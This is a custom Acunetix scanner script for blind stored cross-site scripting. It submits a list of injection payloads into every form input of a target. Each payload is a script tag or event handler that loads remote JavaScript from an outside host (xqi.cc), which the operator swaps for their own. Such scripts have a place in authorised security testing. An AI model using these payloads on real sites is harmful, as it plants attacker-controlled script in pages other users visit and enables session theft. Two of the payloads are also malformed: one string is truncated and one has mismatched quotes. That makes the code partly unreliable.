//
// https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/
//
// Rename to Blind_XSS.script and place this in C:\ProgramData\Acunetix WVS 8\Data\Scripts\ 
// You need co change the ctrl variable below to set the destination of the script to be 
// executed.
//

var targetUrl = new TURL(scanURL.url);

logInfo("Started Blind Stored XSS on " + targetUrl);
 
// Change for the host containing the JS payload:
var ctrl = 'xqi.cc';

var payloads = [
	'<script src=//' + ctrl + '></script>',
	'"><script src=//' + ctrl + '></script><"',
	"'><script src=//' + ctrl + '></script><'",
	"\" onmouseover=\"var n=document.createElement('script'); n.type='text/javascript';n.src='//" + ctrl + "'; x=document.getElementsByTagName('head'); x[0].appendChild(n);",
	"\" onload=\"var n=document.createElement('script'); n.type='text/javascript';n.src='//" + ctrl + "'; x=document.getElementsByTagName('head'); x[0].appendChild(n);",
	"\" onmouseover=\"var n=document.createElement('script'); ext/javascript';n.src='//" + ctrl + "'; x=document.getElementsByTagName('head'); x[0].appendChild(n);",
	"\" onload=\"var n=document.createElement('script'); n.src='//" + ctrl + "'; x=document.getElementsByTagName('head'); x[0].appendChild(n);"
];

var scheme = getCurrentScheme();

// a scheme can have multiple inputs
for (var i=0;i<scheme.inputCount; i++)
{
	// each input can have multiple variations
	var variations = scheme.selectVariationsForInput(i);
	for (var j=0; j < variations.count; j++) 
	{
			var job = new THTTPJob();			
			job.url = targetUrl;			
			scheme.loadVariation(variations.item(j));
			
			// set input value to our payload <XSS>
			for (var k = 0; k < payloads.length; k++) {
				scheme.setInputValue(i, payloads[k]);		
				scheme.populateRequest(job);
				job.execute();
			}
	
					
	}
}